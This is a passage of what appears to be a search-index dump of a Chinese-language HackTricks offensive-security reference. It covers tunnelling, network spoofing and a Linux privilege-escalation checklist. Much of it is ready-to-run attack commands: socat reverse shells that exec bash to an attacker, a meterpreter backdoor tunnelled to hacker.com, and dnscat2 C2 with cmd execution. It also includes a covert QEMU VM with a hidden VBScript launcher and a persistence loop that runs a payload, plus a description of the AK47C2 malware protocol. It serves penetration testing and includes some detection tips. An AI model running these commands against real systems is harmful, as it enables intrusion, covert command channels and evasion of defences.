shell"},"1304":{"body":"bash attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0\\nvictim> socat TCP4::1337 EXEC:bash,pty,stderr,setsid,sigint,sane","breadcrumbs":"Tunneling and Port Forwarding » 反向 shell","id":"1304","title":"反向 shell"},"1305":{"body":"bash 
socat TCP4-LISTEN:,fork TCP4:: &","breadcrumbs":"Tunneling and Port Forwarding » Port2Port","id":"1305","title":"Port2Port"},"1306":{"body":"bash socat TCP4-LISTEN:1234,fork SOCKS4A:127.0.0.1:google.com:80,socksport=5678","breadcrumbs":"Tunneling and Port Forwarding » 通过socks的Port2Port","id":"1306","title":"通过socks的Port2Port"},"1307":{"body":"bash #Create meterpreter backdoor to port 3333 and start msfconsole listener in that port\\nattacker> socat OPENSSL-LISTEN:443,cert=server.pem,cafile=client.crt,reuseaddr,fork,verify=1 TCP:127.0.0.1:3333 bash victim> socat.exe TCP-LISTEN:2222 OPENSSL,verify=1,cert=client.pem,cafile=server.crt,connect-timeout=5|TCP:hacker.com:443,connect-timeout=5\\n#Execute the meterpreter 您可以通过在受害者的控制台中执行这一行来绕过 非认证代理 ,而不是最后一行: bash OPENSSL,verify=1,cert=client.pem,cafile=server.crt,connect-timeout=5|PROXY:hacker.com:443,connect-timeout=5|TCP:proxy.lan:8080,connect-timeout=5 https://funoverip.net/2011/01/reverse-ssl-backdoor-with-socat-and-metasploit/","breadcrumbs":"Tunneling and Port Forwarding » 通过 SSL Socat 的 Meterpreter","id":"1307","title":"通过 SSL Socat 的 Meterpreter"},"1308":{"body":"/bin/sh console 在客户端和服务器两侧创建证书: bash # Execute these commands on both sides\\nFILENAME=socatssl\\nopenssl genrsa -out $FILENAME.key 1024\\nopenssl req -new -key $FILENAME.key -x509 -days 3653 -out $FILENAME.crt\\ncat $FILENAME.key $FILENAME.crt >$FILENAME.pem\\nchmod 600 $FILENAME.key $FILENAME.pem bash attacker-listener> socat OPENSSL-LISTEN:433,reuseaddr,cert=server.pem,cafile=client.crt EXEC:/bin/sh\\nvictim> socat STDIO OPENSSL-CONNECT:localhost:433,cert=client.pem,cafile=server.crt","breadcrumbs":"Tunneling and Port Forwarding » SSL Socat Tunnel","id":"1308","title":"SSL Socat Tunnel"},"1309":{"body":"将本地 SSH 端口 (22) 连接到攻击者主机的 443 端口 bash attacker> sudo socat TCP4-LISTEN:443,reuseaddr,fork TCP4-LISTEN:2222,reuseaddr #Redirect port 2222 to port 443 in localhost\\nvictim> while true; do socat TCP4::443 TCP4:127.0.0.1:22 ; done # Establish connection with 
the port 443 of the attacker and everything that comes from here is redirected to port 22\\nattacker> ssh localhost -p 2222 -l www-data -i vulnerable #Connects to the ssh of the victim","breadcrumbs":"Tunneling and Port Forwarding » Remote Port2Port","id":"1309","title":"Remote Port2Port"},"131":{"body":"攻击者通过发送伪造的 DHCP 响应,为网络中新加入的主机配置所有网络参数(GW、IP、DNS)。 bash Ettercap\\nyersinia dhcp -attack 2 #More parameters are needed","breadcrumbs":"Pentesting Network » Spoofing","id":"131","title":"Spoofing"},"1310":{"body":"它就像一个控制台版本的 PuTTY(选项与 ssh 客户端非常相似)。 由于这个二进制文件将在受害者的机器上执行,并且它是一个 ssh 客户端,我们需要打开我们的 ssh 服务和端口,以便能够建立反向连接。然后,要将仅本地可访问的端口转发到我们机器上的一个端口: bash echo y | plink.exe -l -pw [-p ] -R :: \\necho y | plink.exe -l root -pw password [-p 2222] -R 9090:127.0.0.1:9090 10.11.0.41 #Local port 9090 to out port 9090","breadcrumbs":"Tunneling and Port Forwarding » Plink.exe","id":"1310","title":"Plink.exe"},"1311":{"body":"","breadcrumbs":"Tunneling and Port Forwarding » Windows netsh","id":"1311","title":"Windows netsh"},"1312":{"body":"您需要是本地管理员(对于任何端口) bash netsh interface portproxy add v4tov4 listenaddress= listenport= connectaddress= connectport= protocol=tcp\\n# Example:\\nnetsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=4444 connectaddress=10.10.10.10 connectport=4444\\n# Check the port forward was created:\\nnetsh interface portproxy show v4tov4\\n# Delete port forward\\nnetsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=4444","breadcrumbs":"Tunneling and Port Forwarding » Port2Port","id":"1312","title":"Port2Port"},"1313":{"body":"您需要拥有 系统的RDP访问权限 。 下载: SocksOverRDP x64 Binaries - 此工具使用Windows的远程桌面服务功能中的Dynamic Virtual Channels(DVC)。DVC负责 在RDP连接上隧道数据包 。 Proxifier Portable Binary 在您的客户端计算机上加载**SocksOverRDP-Plugin.dll**,如下所示: bash # Load SocksOverRDP.dll using regsvr32.exe\\nC:\\\\SocksOverRDP-x64> regsvr32.exe SocksOverRDP-Plugin.dll 现在我们可以通过 RDP 使用 mstsc.exe 连接到 victim ,我们应该收到一个 prompt ,提示 SocksOverRDP 插件已启用 ,并且它将 listen 在 
127.0.0.1:1080 。 通过 RDP 连接,并在受害者机器上上传并执行 SocksOverRDP-Server.exe 二进制文件: C:\\\\SocksOverRDP-x64> SocksOverRDP-Server.exe 现在,在你的机器(攻击者)上确认端口 1080 正在监听: netstat -antb | findstr 1080 现在您可以使用 Proxifier 通过该端口代理流量。","breadcrumbs":"Tunneling and Port Forwarding » SocksOverRDP & Proxifier","id":"1313","title":"SocksOverRDP & Proxifier"},"1314":{"body":"您可以使用 Proxifier 使 Windows GUI 应用程序通过代理导航。 在 Profile -> Proxy Servers 中添加 SOCKS 服务器的 IP 和端口。 在 Profile -> Proxification Rules 中添加要代理的程序名称和要代理的 IP 连接。","breadcrumbs":"Tunneling and Port Forwarding » 代理 Windows GUI 应用程序","id":"1314","title":"代理 Windows GUI 应用程序"},"1315":{"body":"之前提到的工具: Rpivot OpenVPN 也可以绕过它,在配置文件中设置这些选项: bash http-proxy 8080 ntlm","breadcrumbs":"Tunneling and Port Forwarding » NTLM 代理绕过","id":"1315","title":"NTLM 代理绕过"},"1316":{"body":"http://cntlm.sourceforge.net/ 它对代理进行身份验证,并在本地绑定一个端口,该端口转发到您指定的外部服务。然后,您可以通过此端口使用您选择的工具。 例如,转发端口 443 Username Alice\\nPassword P@ssw0rd\\nDomain CONTOSO.COM\\nProxy 10.0.0.10:8080\\nTunnel 2222::443 现在,如果你在受害者的 SSH 服务上设置监听端口为443。你可以通过攻击者的2222端口连接到它。 你也可以使用连接到localhost:443的 meterpreter ,而攻击者在2222端口监听。","breadcrumbs":"Tunneling and Port Forwarding » Cntlm","id":"1316","title":"Cntlm"},"1317":{"body":"由微软创建的反向代理。你可以在这里找到它: https://github.com/microsoft/reverse-proxy","breadcrumbs":"Tunneling and Port Forwarding » YARP","id":"1317","title":"YARP"},"1318":{"body":"","breadcrumbs":"Tunneling and Port Forwarding » DNS Tunneling","id":"1318","title":"DNS Tunneling"},"1319":{"body":"https://code.kryo.se/iodine/ 在两个系统中都需要root权限,以创建tun适配器并通过DNS查询在它们之间隧道数据。 attacker> iodined -f -c -P P@ssw0rd 1.1.1.1 tunneldomain.com\\nvictim> iodine -f -P P@ssw0rd tunneldomain.com -r\\n#You can see the victim at 1.1.1.2 隧道将非常慢。您可以通过使用以下命令在此隧道中创建一个压缩的SSH连接: ssh @1.1.1.2 -C -c blowfish-cbc,arcfour -o CompressionLevel=9 -D 1080","breadcrumbs":"Tunneling and Port Forwarding » Iodine","id":"1319","title":"Iodine"},"132":{"body":"参见 上一节 。","breadcrumbs":"Pentesting Network » ARP Spoofing","id":"132","title":"ARP 
Spoofing"},"1320":{"body":"从这里下载 . 通过DNS建立C&C通道。它不需要root权限。 bash attacker> ruby ./dnscat2.rb tunneldomain.com\\nvictim> ./dnscat2 tunneldomain.com # If using it in an internal network for a CTF:\\nattacker> ruby dnscat2.rb --dns host=10.10.10.10,port=53,domain=mydomain.local --no-cache\\nvictim> ./dnscat2 --dns host=10.10.10.10,port=5353 在 PowerShell 中 您可以使用 dnscat2-powershell 在 PowerShell 中运行 dnscat2 客户端: Import-Module .\\\\dnscat2.ps1\\nStart-Dnscat2 -DNSserver 10.10.10.10 -Domain mydomain.local -PreSharedSecret somesecret -Exec cmd 使用 dnscat 进行端口转发 bash session -i \\nlisten [lhost:]lport rhost:rport #Ex: listen 127.0.0.1:8080 10.0.0.20:80, this bind 8080port in attacker host 更改 proxychains DNS Proxychains 拦截 gethostbyname libc 调用,并通过 socks 代理隧道 tcp DNS 请求。默认情况下,proxychains 使用的 DNS 服务器是 4.2.2.2 (硬编码)。要更改它,请编辑文件: /usr/lib/proxychains3/proxyresolv 并更改 IP。如果您在 Windows 环境 中,可以设置 域控制器 的 IP。","breadcrumbs":"Tunneling and Port Forwarding » DNSCat2","id":"1320","title":"DNSCat2"},"1321":{"body":"https://github.com/hotnops/gtunnel","breadcrumbs":"Tunneling and Port Forwarding » Go 中的隧道","id":"1321","title":"Go 中的隧道"},"1322":{"body":"Storm-2603 行动者创建了一个 双通道 C2 (\\"AK47C2\\") ,仅利用出站 DNS 和 普通 HTTP POST 流量——这两种协议在企业网络中很少被阻止。 DNS 模式 (AK47DNS) • 生成一个随机的 5 字符 SessionID(例如 H4T14)。 • 为 任务请求 前缀 1,为 结果 前缀 2,并连接不同字段(标志、SessionID、计算机名称)。 • 每个字段都用 ASCII 密钥 VHBD@H XOR 加密 ,十六进制编码,并用点连接在一起——最终以攻击者控制的域名结束: text <1|2>.a..update.updatemicfosoft.com • 请求使用 DnsQuery() 获取 TXT (并回退到 MG )记录。 • 当响应超过 0xFF 字节时,后门 将数据分片 为 63 字节,并插入标记: stp 以便 C2 服务器可以重新排序它们。 HTTP 模式 (AK47HTTP) • 构建一个 JSON 信封: json {\\"cmd\\":\\"\\",\\"cmd_id\\":\\"\\",\\"fqdn\\":\\"\\",\\"result\\":\\"\\",\\"type\\":\\"task\\"} • 整个数据块进行 XOR-VHBD@H → 十六进制 → 作为 POST / 的主体发送,头部为 Content-Type: text/plain。 • 回复遵循相同的编码,cmd 字段通过 cmd.exe /c 2>&1 执行。 蓝队注意事项 • 寻找不寻常的 TXT 查询 ,其第一个标签是长十六进制,并且总是以一个稀有域名结束。 • 一个恒定的 XOR 密钥后跟 ASCII-十六进制很容易用 YARA 检测: 6?56484244?484(十六进制中的 VHBD@H)。 • 对于 HTTP,标记纯十六进制且字节数为偶数的 text/plain POST 主体。 {{#note}} 整个通道适合 标准 RFC 
兼容查询 ,并保持每个子域标签在 63 字节以下,使其在大多数 DNS 日志中隐蔽。 {{#endnote}}","breadcrumbs":"Tunneling and Port Forwarding » 自定义 DNS TXT / HTTP JSON C2 (AK47C2)","id":"1322","title":"自定义 DNS TXT / HTTP JSON C2 (AK47C2)"},"1323":{"body":"","breadcrumbs":"Tunneling and Port Forwarding » ICMP 隧道","id":"1323","title":"ICMP 隧道"},"1324":{"body":"https://github.com/friedrich/hans https://github.com/albertzak/hanstunnel 在两个系统中都需要 root 权限,以创建 tun 适配器并使用 ICMP 回显请求在它们之间隧道数据。 bash ./hans -v -f -s 1.1.1.1 -p P@ssw0rd #Start listening (1.1.1.1 is IP of the new vpn connection)\\n./hans -f -c -p P@ssw0rd -v\\nping 1.1.1.100 #After a successful connection, the victim will be in the 1.1.1.100","breadcrumbs":"Tunneling and Port Forwarding » Hans","id":"1324","title":"Hans"},"1325":{"body":"从这里下载 。 bash # Generate it\\nsudo ./autogen.sh # Server -- victim (needs to be able to receive ICMP)\\nsudo ptunnel-ng\\n# Client - Attacker\\nsudo ptunnel-ng -p -l -r -R \\n# Try to connect with SSH through ICMP tunnel\\nssh -p 2222 -l user 127.0.0.1\\n# Create a socks proxy through the SSH connection through the ICMP tunnel\\nssh -D 9050 -p 2222 -l user 127.0.0.1","breadcrumbs":"Tunneling and Port Forwarding » ptunnel-ng","id":"1325","title":"ptunnel-ng"},"1326":{"body":"ngrok 是一个可以通过一条命令行将解决方案暴露到互联网的工具。 暴露的 URI 类似于: UID.ngrok.io","breadcrumbs":"Tunneling and Port Forwarding » ngrok","id":"1326","title":"ngrok"},"1327":{"body":"创建一个账户: https://ngrok.com/signup 客户端下载: bash tar xvzf ~/Downloads/ngrok-v3-stable-linux-amd64.tgz -C /usr/local/bin\\nchmod a+x ./ngrok\\n# Init configuration, with your token\\n./ngrok config edit","breadcrumbs":"Tunneling and Port Forwarding » 安装","id":"1327","title":"安装"},"1328":{"body":"文档: https://ngrok.com/docs/getting-started/ . 
如果需要,也可以添加身份验证和TLS。 隧道 TCP bash # Pointing to 0.0.0.0:4444\\n./ngrok tcp 4444\\n# Example of resulting link: 0.tcp.ngrok.io:12345\\n# Listen (example): nc -nvlp 4444\\n# Remote connect (example): nc $(dig +short 0.tcp.ngrok.io) 12345 通过HTTP暴露文件 bash ./ngrok http file:///tmp/httpbin/\\n# Example of resulting link: https://abcd-1-2-3-4.ngrok.io/ 嗅探 HTTP 调用 对 XSS, SSRF, SSTI ... 有用 直接从 stdout 或在 HTTP 接口 http://127.0.0.1:4040 。 隧道内部 HTTP 服务 bash ./ngrok http localhost:8080 --host-header=rewrite\\n# Example of resulting link: https://abcd-1-2-3-4.ngrok.io/\\n# With basic auth\\n./ngrok http localhost:8080 --host-header=rewrite --auth=\\"myuser:mysuperpassword\\" ngrok.yaml 简单配置示例 它打开 3 个隧道: 2 个 TCP 1 个 HTTP,静态文件从 /tmp/httpbin/ 暴露 yaml tunnels:\\nmytcp:\\naddr: 4444\\nproto: tcptunne\\nanothertcp:\\naddr: 5555\\nproto: tcp\\nhttpstatic:\\nproto: http\\naddr: file:///tmp/httpbin/","breadcrumbs":"Tunneling and Port Forwarding » 基本用法","id":"1328","title":"基本用法"},"1329":{"body":"Cloudflare的 cloudflared 守护进程可以创建出站隧道,暴露 本地 TCP/UDP 服务 ,而无需入站防火墙规则,使用Cloudflare的边缘作为会合点。当出站防火墙仅允许HTTPS流量而入站连接被阻止时,这非常方便。","breadcrumbs":"Tunneling and Port Forwarding » Cloudflared (Cloudflare Tunnel)","id":"1329","title":"Cloudflared (Cloudflare Tunnel)"},"133":{"body":"ICMP Redirect 是通过发送 ICMP packet type 1 code 5 来实现的,该报文表明 attacker 是到达某个 IP 的最佳路径。然后,当 victim 想要联系该 IP 时,会通过 attacker 转发该 packet。 bash Ettercap\\nicmp_redirect\\nhping3 [VICTIM IP ADDRESS] -C 5 -K 1 -a [VICTIM DEFAULT GW IP ADDRESS] --icmp-gw [ATTACKER IP ADDRESS] --icmp-ipdst [DST IP ADDRESS] --icmp-ipsrc [VICTIM IP ADDRESS] #Send icmp to [1] form [2], route to [3] packets sent to [4] from [5]","breadcrumbs":"Pentesting Network » ICMPRedirect","id":"133","title":"ICMPRedirect"},"1330":{"body":"bash # Expose a local web service listening on 8080\\ncloudflared tunnel --url http://localhost:8080\\n# => Generates https://.trycloudflare.com that forwards to 127.0.0.1:8080","breadcrumbs":"Tunneling and Port Forwarding » 
快速隧道一行命令","id":"1330","title":"快速隧道一行命令"},"1331":{"body":"bash # Turn the tunnel into a SOCKS5 proxy on port 1080\\ncloudflared tunnel --url socks5://localhost:1080 --socks5\\n# Now configure proxychains to use 127.0.0.1:1080","breadcrumbs":"Tunneling and Port Forwarding » SOCKS5 透传","id":"1331","title":"SOCKS5 透传"},"1332":{"body":"bash cloudflared tunnel create mytunnel\\ncloudflared tunnel route dns mytunnel internal.example.com\\n# config.yml\\nTunnel: \\ncredentials-file: /root/.cloudflared/.json\\nurl: http://127.0.0.1:8000 开始连接器: bash cloudflared tunnel run mytunnel 因为所有流量都通过主机 出站 443 端口发送,Cloudflared 隧道是绕过入口 ACL 或 NAT 边界的简单方法。请注意,二进制文件通常以提升的权限运行 - 尽可能使用容器或 --user 标志。","breadcrumbs":"Tunneling and Port Forwarding » 使用DNS的持久隧道","id":"1332","title":"使用DNS的持久隧道"},"1333":{"body":"frp 是一个积极维护的 Go 反向代理,支持 TCP、UDP、HTTP/S、SOCKS 和 P2P NAT 穿透 。从 v0.53.0 (2024年5月) 开始,它可以充当 SSH 隧道网关 ,因此目标主机可以仅使用标准的 OpenSSH 客户端启动反向隧道 - 无需额外的二进制文件。","breadcrumbs":"Tunneling and Port Forwarding » FRP (快速反向代理)","id":"1333","title":"FRP (快速反向代理)"},"1334":{"body":"bash # Attacker / server\\n./frps -c frps.toml # listens on 0.0.0.0:7000 # Victim\\n./frpc -c frpc.toml # will expose 127.0.0.1:3389 on frps:5000 # frpc.toml\\nserverAddr = \\"attacker_ip\\"\\nserverPort = 7000 [[proxies]]\\nname = \\"rdp\\"\\ntype = \\"tcp\\"\\nlocalIP = \\"127.0.0.1\\"\\nlocalPort = 3389\\nremotePort = 5000","breadcrumbs":"Tunneling and Port Forwarding » 经典反向 TCP 隧道","id":"1334","title":"经典反向 TCP 隧道"},"1335":{"body":"bash # On frps (attacker)\\nsshTunnelGateway.bindPort = 2200 # add to frps.toml\\n./frps -c frps.toml # On victim (OpenSSH client only)\\nssh -R :80:127.0.0.1:8080 v0@attacker_ip -p 2200 tcp --proxy_name web --remote_port 9000 上述命令将受害者的端口 8080 发布为 attacker_ip:9000 ,无需部署任何额外工具 – 非常适合利用现有资源进行转发。","breadcrumbs":"Tunneling and Port Forwarding » 使用新的 SSH 网关(无 frpc 二进制文件)","id":"1335","title":"使用新的 SSH 网关(无 frpc 二进制文件)"},"1336":{"body":"QEMU 的用户模式网络 (-netdev user) 支持一个名为 hostfwd 的选项,该选项 将 主机 上的 TCP/UDP 
端口绑定并转发到 客户机 中 。 当客户机运行完整的 SSH 守护进程时,hostfwd 规则为您提供一个一次性 SSH 跳转盒,完全存在于一个临时 VM 中 – 非常适合隐藏 C2 流量,因为所有恶意活动和文件都保留在虚拟磁盘中。","breadcrumbs":"Tunneling and Port Forwarding » 使用 QEMU 的隐蔽 VM 基于隧道","id":"1336","title":"使用 QEMU 的隐蔽 VM 基于隧道"},"1337":{"body":"powershell # Windows victim (no admin rights, no driver install – portable binaries only)\\nqemu-system-x86_64.exe ^\\n-m 256M ^\\n-drive file=tc.qcow2,if=ide ^\\n-netdev user,id=n0,hostfwd=tcp::2222-:22 ^\\n-device e1000,netdev=n0 ^\\n-nographic • 上面的命令在 RAM 中启动一个 Tiny Core Linux 镜像 (tc.qcow2)。 • Windows 主机上的端口 2222/tcp 透明地转发到来宾内部的 22/tcp 。 • 从攻击者的角度来看,目标仅仅暴露了端口 2222;任何到达该端口的数据包都由在虚拟机中运行的 SSH 服务器处理。","breadcrumbs":"Tunneling and Port Forwarding » 快速一行命令","id":"1337","title":"快速一行命令"},"1338":{"body":"vb \' update.vbs – lived in C:\\\\ProgramData\\\\update\\nSet o = CreateObject(\\"Wscript.Shell\\")\\no.Run \\"stl.exe -m 256M -drive file=tc.qcow2,if=ide -netdev user,id=n0,hostfwd=tcp::2222-:22\\", 0 运行脚本 cscript.exe //B update.vbs 可以保持窗口隐藏。","breadcrumbs":"Tunneling and Port Forwarding » 通过 VBScript 隐秘启动","id":"1338","title":"通过 VBScript 隐秘启动"},"1339":{"body":"由于 Tiny Core 是无状态的,攻击者通常会: 将有效载荷放置到 /opt/123.out 追加到 /opt/bootlocal.sh: sh while ! 
ping -c1 45.77.4.101; do sleep 2; done\\n/opt/123.out 将 home/tc 和 opt 添加到 /opt/filetool.lst,以便在关机时将有效载荷打包到 mydata.tgz 中。","breadcrumbs":"Tunneling and Port Forwarding » 客户端持久性","id":"1339","title":"客户端持久性"},"134":{"body":"attacker 将解析 victim 请求的一些(或全部)域名。 bash set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on 使用 dnsmasq 配置自己的 DNS bash apt-get install dnsmasqecho \\"addn-hosts=dnsmasq.hosts\\" > dnsmasq.conf #Create dnsmasq.confecho \\"127.0.0.1 domain.example.com\\" > dnsmasq.hosts #Domains in dnsmasq.hosts will be the domains resolved by the Dsudo dnsmasq -C dnsmasq.conf --no-daemon\\ndig @localhost domain.example.com # Test the configured DNS","breadcrumbs":"Pentesting Network » DNS Spoofing","id":"134","title":"DNS Spoofing"},"1340":{"body":"• 只有两个未签名的可执行文件 (qemu-system-*.exe) 访问磁盘;没有安装驱动程序或服务。 • 主机上的安全产品看到的是 良性的回环流量 (实际的 C2 在虚拟机内部终止)。 • 内存扫描器从未分析恶意进程空间,因为它存在于不同的操作系统中。","breadcrumbs":"Tunneling and Port Forwarding » 为什么这能逃避检测","id":"1340","title":"为什么这能逃避检测"},"1341":{"body":"• 对用户可写路径中的 意外 QEMU/VirtualBox/KVM 二进制文件 发出警报。 • 阻止来自 qemu-system*.exe 的出站连接。 • 寻找在 QEMU 启动后立即绑定的稀有监听端口(2222, 10022, …)。","breadcrumbs":"Tunneling and Port Forwarding » Defender 提示","id":"1341","title":"Defender 提示"},"1342":{"body":"https://github.com/securesocketfunneling/ssf https://github.com/z3APA3A/3proxy","breadcrumbs":"Tunneling and Port Forwarding » 其他检查工具","id":"1342","title":"其他检查工具"},"1343":{"body":"Hiding in the Shadows: Covert Tunnels via QEMU Virtualization Check Point Research – Before ToolShell: Exploring Storm-2603’s Previous Ransomware Operations tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Tunneling and Port Forwarding » 参考文献","id":"1343","title":"参考文献"},"1344":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Checklist - Linux Privilege Escalation » Checklist - Linux Privilege Escalation","id":"1344","title":"Checklist - Linux Privilege Escalation"},"1345":{"body":"","breadcrumbs":"Checklist - Linux Privilege Escalation » 查找Linux本地权限提升向量的最佳工具: LinPEAS","id":"1345","title":"查找Linux本地权限提升向量的最佳工具: LinPEAS"},"1346":{"body":"获取 操作系统信息 检查 PATH ,是否有 可写文件夹 ? 检查 环境变量 ,是否有敏感信息? 搜索 内核漏洞 使用脚本 (DirtyCow?) 检查 sudo版本是否存在漏洞 Dmesg 签名验证失败 更多系统枚举( 日期,系统统计,CPU信息,打印机 ) 枚举更多防御措施","breadcrumbs":"Checklist - Linux Privilege Escalation » 系统信息","id":"1346","title":"系统信息"},"1347":{"body":"列出已挂载 的驱动器 有未挂载的驱动器吗? fstab中有任何凭据吗?","breadcrumbs":"Checklist - Linux Privilege Escalation » 驱动器","id":"1347","title":"驱动器"},"1348":{"body":"检查是否安装了 有用的软件 检查是否安装了 易受攻击的软件","breadcrumbs":"Checklist - Linux Privilege Escalation » 已安装软件","id":"1348","title":"已安装软件"},"1349":{"body":"是否有 未知软件在运行 ? 是否有软件以 超出其应有的权限 运行? 搜索 正在运行进程的漏洞 (特别是正在运行的版本)。 你能 修改任何正在运行进程的二进制文件 吗? 
监控进程 ,检查是否有任何有趣的进程频繁运行。 你能 读取 一些有趣的 进程内存 (可能保存密码的地方)吗?","breadcrumbs":"Checklist - Linux Privilege Escalation » 进程","id":"1349","title":"进程"},"135":{"body":"本地通常存在多条通往系统和网络的路由。在构建了本地网络中 MAC addresses 的列表之后,使用 gateway-finder.py 来识别支持 IPv4 forwarding 的主机。 root@kali:~# git clone https://github.com/pentestmonkey/gateway-finder.git\\nroot@kali:~# cd gateway-finder/\\nroot@kali:~# arp-scan -l | tee hosts.txt\\nInterface: eth0, datalink type: EN10MB (Ethernet)\\nStarting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)\\n10.0.0.100 00:13:72:09:ad:76 Dell Inc.\\n10.0.0.200 00:90:27:43:c0:57 INTEL CORPORATION\\n10.0.0.254 00:08:74:c0:40:ce Dell Computer Corp. root@kali:~/gateway-finder# ./gateway-finder.py -f hosts.txt -i 209.85.227.99\\ngateway-finder v1.0 http://pentestmonkey.net/tools/gateway-finder\\n[+] Using interface eth0 (-I to change)\\n[+] Found 3 MAC addresses in hosts.txt\\n[+] We can ping 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]\\n[+] We can reach TCP port 80 on 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]","breadcrumbs":"Pentesting Network » 本地网关","id":"135","title":"本地网关"},"1350":{"body":"PATH 是否被某些cron修改且你可以 写入 ? 在cron作业中有任何 通配符 吗? 是否有某个 可修改的脚本 正在 执行 或在 可修改文件夹 中? 你是否检测到某个 脚本 可能或正在被 频繁执行 ?(每1、2或5分钟)","breadcrumbs":"Checklist - Linux Privilege Escalation » 计划任务/Cron作业?","id":"1350","title":"计划任务/Cron作业?"},"1351":{"body":"有任何 可写的.service 文件吗? 有任何 可写的二进制文件 被 服务 执行吗? 在systemd PATH中有任何 可写文件夹 ?","breadcrumbs":"Checklist - Linux Privilege Escalation » 服务","id":"1351","title":"服务"},"1352":{"body":"有任何 可写的定时器 ?","breadcrumbs":"Checklist - Linux Privilege Escalation » 定时器","id":"1352","title":"定时器"},"1353":{"body":"有任何 可写的.socket 文件吗? 你能 与任何套接字通信 吗? 
HTTP套接字 中有有趣的信息吗?","breadcrumbs":"Checklist - Linux Privilege Escalation » 套接字","id":"1353","title":"套接字"},"1354":{"body":"你能 与任何D-Bus通信 吗?","breadcrumbs":"Checklist - Linux Privilege Escalation » D-Bus","id":"1354","title":"D-Bus"},"1355":{"body":"枚举网络以了解你的位置 打开的端口你之前无法访问 ,现在可以在机器内部获取shell吗? 你能使用 tcpdump 嗅探流量 吗?","breadcrumbs":"Checklist - Linux Privilege Escalation » 网络","id":"1355","title":"网络"},"1356":{"body":"通用用户/组 枚举 你有一个 非常大的UID 吗? 机器 易受攻击 吗? 你能 通过你所属的组提升权限 吗? 剪贴板 数据? 密码策略? 尝试 使用 你之前发现的每个 已知密码 登录 每个 可能的 用户 。 也尝试不带密码登录。","breadcrumbs":"Checklist - Linux Privilege Escalation » 用户","id":"1356","title":"用户"},"1357":{"body":"如果你对某个PATH中的文件夹 具有写权限 ,你可能能够提升权限","breadcrumbs":"Checklist - Linux Privilege Escalation » 可写的PATH","id":"1357","title":"可写的PATH"},"1358":{"body":"你能执行 任何带sudo的命令 吗? 你能用它 读取、写入或执行 任何东西作为root吗? ( GTFOBins ) 是否有任何 可利用的SUID二进制文件 ? ( GTFOBins ) sudo 命令是否 受限于 路径 ?你能 绕过 限制吗 ? 没有指定路径的Sudo/SUID二进制文件 ? 指定路径的SUID二进制文件 ? 绕过 LD_PRELOAD漏洞 SUID二进制文件中缺少.so库 来自可写文件夹? 可用的SUDO令牌 ? 你能创建SUDO令牌吗 ? 你能 读取或修改sudoers文件 吗? 你能 修改/etc/ld.so.conf.d/ 吗? 
OpenBSD DOAS 命令","breadcrumbs":"Checklist - Linux Privilege Escalation » SUDO和SUID命令","id":"1358","title":"SUDO和SUID命令"},"1359":{"body":"是否有任何二进制文件具有 意外的能力 ?","breadcrumbs":"Checklist - Linux Privilege Escalation » 能力","id":"1359","title":"能力"},"136":{"body":"当 DNS 查询失败时,本地主机解析在 Microsoft 系统中依赖 Link-Local Multicast Name Resolution (LLMNR) 和 NetBIOS Name Service (NBT-NS) 。类似地, Apple Bonjour 和 Linux zero-configuration 实现使用 Multicast DNS (mDNS) 在网络中发现主机。由于这些协议未经认证且在 UDP 上以广播方式工作,攻击者可以利用它们将用户重定向到恶意服务。 可以使用 Responder 向主机发送伪造响应,冒充主机查找的服务。 更多关于 如何使用 Responder 冒充服务 的信息请阅读此处。","breadcrumbs":"Pentesting Network » Spoofing LLMNR, NBT-NS, and mDNS","id":"136","title":"Spoofing LLMNR, NBT-NS, and mDNS"},"1360":{"body":"是否有任何文件具有 意外的ACL ?","breadcrumbs":"Checklist - Linux Privilege Escalation » ACLs","id":"1360","title":"ACLs"},"1361":{"body":"screen tmux","breadcrumbs":"Checklist - Linux Privilege Escalation » 开放Shell会话","id":"1361","title":"开放Shell会话"},"1362":{"body":"Debian OpenSSL可预测PRNG - CVE-2008-0166 SSH有趣的配置值","breadcrumbs":"Checklist - Linux Privilege Escalation » SSH","id":"1362","title":"SSH"},"1363":{"body":"配置文件 - 读取敏感数据? 写入权限提升? passwd/shadow文件 - 读取敏感数据? 写入权限提升? 检查常见的有趣文件夹 以查找敏感数据 **奇怪的位置/拥有的文件,**你可能有权限访问或更改可执行文件 最近几分钟内修改 Sqlite数据库文件 隐藏文件 PATH中的脚本/二进制文件 Web文件 (密码?) 备份 ? 已知包含密码的文件 :使用 Linpeas 和 LaZagne 通用搜索","breadcrumbs":"Checklist - Linux Privilege Escalation » 有趣的文件","id":"1363","title":"有趣的文件"},"1364":{"body":"修改python库 以执行任意命令? 你能 修改日志文件 吗? Logtotten 漏洞 你能 **修改/etc/sysconfig/network-scripts/**吗? Centos/Redhat 漏洞 你能 写入ini、int.d、systemd或rc.d文件 吗?","breadcrumbs":"Checklist - Linux Privilege Escalation » 可写文件","id":"1364","title":"可写文件"},"1365":{"body":"你能 利用NFS提升权限 吗? 你需要 逃离限制性shell 吗? tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 